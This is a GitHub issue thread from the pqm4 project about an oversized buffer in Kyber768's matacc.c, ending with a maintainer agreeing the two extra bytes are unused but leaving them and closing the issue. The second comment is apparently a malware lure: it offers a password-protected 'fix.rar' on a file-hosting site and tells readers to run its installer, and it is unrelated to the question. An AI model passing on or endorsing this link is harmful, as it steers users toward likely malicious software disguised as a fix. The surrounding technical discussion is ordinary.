mupq/pqm4 #357: size of buffer in kyber768/m4fstack/matacc.c (and probably m4fspeed too)

marco-palumbi, 2024-08-27:
**unsigned char buf[XOF_BLOCKBYTES+2];** could be of size **XOF_BLOCKBYTES** (see:  https://github.com/mupq/pqm4/blob/master/crypto_kem/kyber768/m4fstack/matacc.c#L20)

if I'm not wrong the code relay on XOF_BLOCKBYTES being multiple of 3 (see https://github.com/pq-crystals/kyber/commit/ce492cd3d56bfca61bd941b6a73da3764e799aae) and **xof_squeezeblocks()** is always called with the address of the first byte of **buf** (see also https://github.com/mupq/pqm4/blob/master/crypto_kem/kyber768/m4fstack/matacc.i#L101)

**buf** can then be defined: **unsigned char buf[XOF_BLOCKBYTES];**
the same should apply to the m4fspeed version.
Can please check?

OtakuFra, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

mkannwischer, 2026-08-25:
Heads-up: pqm4 is being wound down and will be archived in or after January 2027, see #409. We are unlikely to address this ourselves, but pull requests are welcome until **30 November 2026**.

vincentvbh, 2026-10-17:
Thanks for the careful reading, you're right that the extra two bytes are never used now that XOF_BLOCKBYTES is 168. I'll keep the +2 as it is, though: it's harmless and I'd rather not touch this code. Closing.

closed 2026-10-17 by vincentvbh